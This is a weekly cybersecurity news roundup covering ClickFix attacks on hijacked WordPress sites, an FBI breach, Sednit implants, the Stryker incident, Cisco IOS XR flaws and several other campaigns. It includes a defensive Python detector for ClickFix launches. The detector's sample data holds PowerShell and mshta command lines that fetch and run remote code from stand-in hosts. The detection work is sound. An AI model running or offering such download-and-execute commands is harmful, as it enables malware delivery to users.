San Mateo, CA, March 16, 2026 — Stories, events, and developments that impacted the cybersecurity landscape last week, including emerging threats, policy changes, and industry responses.
WordPress Sites Hijacked for ClickFix Malware
Rapid7 says a large-scale cybercrime campaign has hijacked more than 250 legitimate WordPress sites across at least 12 countries to trick visitors into infecting themselves with infostealer malware. Victims are shown fake Cloudflare CAPTCHA pages that use ClickFix-style prompts to persuade them to open the Windows Run box, paste a command, and launch a multistage download chain. Payloads linked to the campaign include Vidar Stealer, Impure Stealer, Vodka Stealer, and Double Donut, all designed to steal credentials, financial data, and digital wallet information. Researchers said the scale and spread of the compromises suggest a highly automated, long-term criminal operation. Rapid7 urged site administrators to patch outdated components, strengthen admin passwords, enable multifactor authentication, and reduce exposure of trusted systems before attackers exploit them further. Read more.
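As an added illustration (not code from the original post or from Rapid7), the check below flags the ClickFix launch pattern described above in process-creation telemetry: a script interpreter started by explorer.exe, as happens from the Run box, with download-and-execute traits on its command line. The record format, hostnames and command lines are constructed for the example; the trait list is an assumption a defender would tune to their own data.

```python
import re

# Constructed process-creation records, loosely modelled on Sysmon Event ID 1
# fields (Image, ParentImage, CommandLine) as tab-separated key=value pairs.
# Written for this example; not telemetry from the campaign Rapid7 described.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    f"Image={PS}\tParentImage=C:\\Windows\\explorer.exe\tCommandLine=powershell -w hidden -ep bypass -c \"irm http://cdn.example.invalid/v.txt | iex\"",
    "Image=C:\\Windows\\System32\\cmd.exe\tParentImage=C:\\Windows\\explorer.exe\tCommandLine=cmd /c ipconfig /all",
    "Image=C:\\Windows\\System32\\mshta.exe\tParentImage=C:\\Windows\\explorer.exe\tCommandLine=mshta https://update.example.invalid/c.hta",
    f"Image={PS}\tParentImage=C:\\Windows\\System32\\svchost.exe\tCommandLine=powershell -NoProfile -File C:\\Scripts\\backup.ps1",
    f"Image={PS}\tParentImage=C:\\Windows\\explorer.exe\tCommandLine=powershell -NoProfile -Command Get-Date",
]

# Interpreters a "paste this into Run" prompt lands in; explorer.exe is the
# parent process when a user launches something from Win+R.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
RUN_BOX_PARENT = "explorer.exe"
# Command-line traits of a staged download-and-execute chain (assumed list).
TRAITS = [
    ("encoded-command", re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I)),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("remote-fetch", re.compile(r"\b(?:irm|iwr|invoke-webrequest|invoke-restmethod|curl|wget)\b", re.I)),
    ("eval-downloaded-text", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("mshta-remote-url", re.compile(r"\bmshta\b.*https?://", re.I)),
]

def parse_event(line):
    """Split one tab-separated key=value record into a dict."""
    return dict(field.split("=", 1) for field in line.split("\t"))

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def clickfix_traits(event):
    """Trait labels matched by a Run-box launch of an interpreter, else []."""
    if (basename(event.get("Image", "")) not in SHELL_IMAGES
            or basename(event.get("ParentImage", "")) != RUN_BOX_PARENT):
        return []
    return [label for label, rx in TRAITS if rx.search(event.get("CommandLine", ""))]

def detect(lines):
    """(index, traits) for each event showing at least one ClickFix trait."""
    hits = [(i, clickfix_traits(parse_event(l))) for i, l in enumerate(lines)]
    return [(i, t) for i, t in hits if t]
```

The same logic maps onto real Sysmon Event ID 1 or Windows 4688 records once the field extraction is swapped for your log format; a benign admin command from the Run box (event 1) and a scheduled script (event 3) produce no hit.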
Hacker Accessed FBI Epstein Files
A foreign hacker breached the FBI’s New York field office in 2023 and accessed files tied to the bureau’s Jeffrey Epstein investigation after a vulnerable server at the Child Exploitation Forensic Lab was left exposed. Reuters, citing an unnamed source and court documents, said the intruder reviewed certain Epstein-related files before the FBI detected and contained the incident. The bureau said it determined the breach was isolated, cut off the attacker’s access, and remediated the affected network. “Following the 2023 cyber incident, the FBI contained the affected network and determined the incident to be an isolated one. The FBI restricted access to the malicious actor and rectified the network,” an FBI spokesperson said. One unusual detail underscores the severity and confusion of the intrusion. According to Reuters, the hacker allegedly did not realize the target was the FBI until agents invited them onto a video call and identified themselves. Read more.
Russian hacker group Sednit reappears with new tools
The Russia-linked Sednit hacker group is again deploying custom malware in cyber-espionage campaigns against Ukrainian targets after years of relying on simpler phishing-delivered tools. ESET found the group using two implants in parallel: BeardShell, a new PowerShell-based backdoor that communicates via Icedrive, and Covenant, a heavily modified open-source .NET framework that now appears to be Sednit’s main espionage platform. Researchers said the dual-tool approach makes detection and takedown harder because each implant uses a different legitimate cloud infrastructure for command-and-control. Sednit also appears to be investing heavily in development, rapidly updating loaders and reverse-engineering services without public APIs. Initial access often comes through social engineering on Signal or WhatsApp, sometimes reinforced by phone calls. The shift suggests renewed investment in stealth, persistence, and wartime intelligence collection. Read more.
Iran-Linked Hackers Hit Medical Tech Firm
An Iranian-linked cyber incident at medical technology giant Stryker shows how geopolitical conflict can spill directly into healthcare operations and global supply chains. The Handala hacker group claimed it wiped more than 200,000 systems and stole 50TB of data, while Stryker confirmed a major disruption to its Microsoft environment in an SEC filing. The company said there is no sign of ransomware or malware, but access to key systems and business applications has been disrupted and restoration timing remains unclear. Researchers said Handala’s behavior looks more like Iranian state activity than independent hacktivism, with some pointing to possible abuse of Microsoft Intune to carry out destructive actions at scale. As Huntress CISO Chris Henderson warned, “healthcare organizations are directly in the crossfire whether they realize it or not.” Read more.
FBI: In the age of AI, security basics still matter the most
FBI officials say AI is making cyberattacks faster, not fundamentally different, which means the best defense is still the same set of basic security measures that defenders have long been told to get right. Speaking at Billington Cybersecurity, deputy assistant director Jason Bilnoski said that while criminal and nation-state actors are using AI to enhance their attacks, intrusion patterns have changed little. He urged organizations not to fixate on AI’s speed and capabilities, but instead to focus on fundamentals that can stop intrusions before they start. “Identity is the new perimeter. You’re hunting legitimate traffic on your network,” Bilnoski said. “So we’re no longer seeing malware drop. We’re no longer seeing these very noisy TTPs [tactics, techniques and procedures]. It’s legitimate credentials moving laterally throughout the network, as if it’s a legitimate user on the network.” Read more.
Cisco Warns of IOS XR Privilege Escalation Flaws
Cisco is warning customers to patch two newly disclosed privilege-escalation flaws in IOS XR Software that could let low-privileged local attackers take over affected routing devices. CVE-2026-20040 allows arbitrary command execution as root because the software does not properly validate user-supplied arguments in certain CLI commands. CVE-2026-20046, which affects IOS XRv 9000 Routers, allows attackers to bypass task group authorization checks and gain full administrative control by exploiting incorrectly mapped CLI permissions. Cisco said the bugs were found during internal security testing and can be exploited independently, meaning attackers do not need to chain them together. IOS, IOS XE, and NX-OS are not affected. Cisco has released fixed software and urged admins to upgrade immediately, especially because CVE-2026-20040 has no workaround for exposed production networks. Read more.
BlackSanta Malware Campaign Targets HR
Russian-speaking threat actors are exploiting routine HR hiring workflows to slip BlackSanta malware into enterprise environments through resume-themed ISO files hosted on trusted cloud services. When opened, the file triggers a malicious shortcut that launches an obfuscated PowerShell script, extracts payloads hidden in image files via steganography, and sideloads a rogue DLL through legitimate signed software. Aryaka said the malware then checks for sandboxes, debuggers, virtual machines and other analysis environments before deploying a BYOVD-based EDR killer. Once active, BlackSanta can terminate antivirus processes, shut down EDR agents, weaken Microsoft Defender, suppress logging and reduce security console visibility, clearing the way for covert data theft over HTTPS. Read more.
Russian Operatives Hijack Signal and WhatsApp Accounts
Dutch intelligence says Russian state operatives are running a large-scale campaign to hijack Signal and WhatsApp accounts belonging to government employees, military personnel, journalists and other high-value targets. The attacks rely on familiar social engineering, including fake Signal Support messages that ask victims for verification codes or PINs, and malicious QR codes or links that abuse the apps’ linked device feature. Dutch officials warned that end-to-end encryption does not make consumer messaging platforms suitable for classified, confidential or sensitive communications. They advised users to watch for duplicate contacts in group chats and suspicious account name changes, such as “Deleted account,” which can signal compromise. Read more.
North Korea Using AI to Boost Fake Worker Schemes
North Korean threat groups are using AI to make their remote worker campaigns faster, broader, and harder to detect, according to Microsoft Threat Intelligence. Microsoft said groups including Coral Sleet, Sapphire Sleet, and Jasper Sleet are using generative AI to build convincing job-seeker personas, research hiring trends, create multilingual phishing lures, alter stolen identity documents, and sustain long-term employment at victim companies. Jasper Sleet has also used AI tools to answer technical questions, generate code, and produce professional workplace communications after operatives are hired, helping them blend in and avoid scrutiny. Microsoft warned that AI is now a “force multiplier” across the attack lifecycle, from initial access to post-compromise activity. It said experiments with agentic AI could eventually make these operations more adaptive and dangerous. Read more.
Trump administration reveals new cybersecurity strategy
The Trump administration has released a new national cyber strategy that casts cybersecurity as a core part of U.S. economic strength, national security, and technological leadership. Published March 6, 2026, the plan lays out six pillars: shaping adversary behavior through cyber operations, streamlining regulations, modernizing federal networks, protecting critical infrastructure and supply chains, maintaining leadership in AI and quantum computing, and expanding the cyber workforce. The White House says the strategy favors proactive disruption over reactive defense, including offensive cyber operations, law enforcement, and sanctions to deter attacks and break up criminal networks. Suzu Labs CEO Michael Bell said, “The six pillars are the right priorities, and the strategy reads like people who understand the threat landscape were involved in writing it. Post-quantum cryptography, private sector offensive operations, regulatory streamlining, AI security. All correct […] but a strategy without a budget is a press release.” Read more.
About NetworkTigers

NetworkTigers is the leader in the secondary market for Grade A, seller-refurbished networking equipment. Founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms, NetworkTigers provides consulting and network equipment to global governmental agencies, Fortune 2000, and healthcare companies. www.networktigers.com.
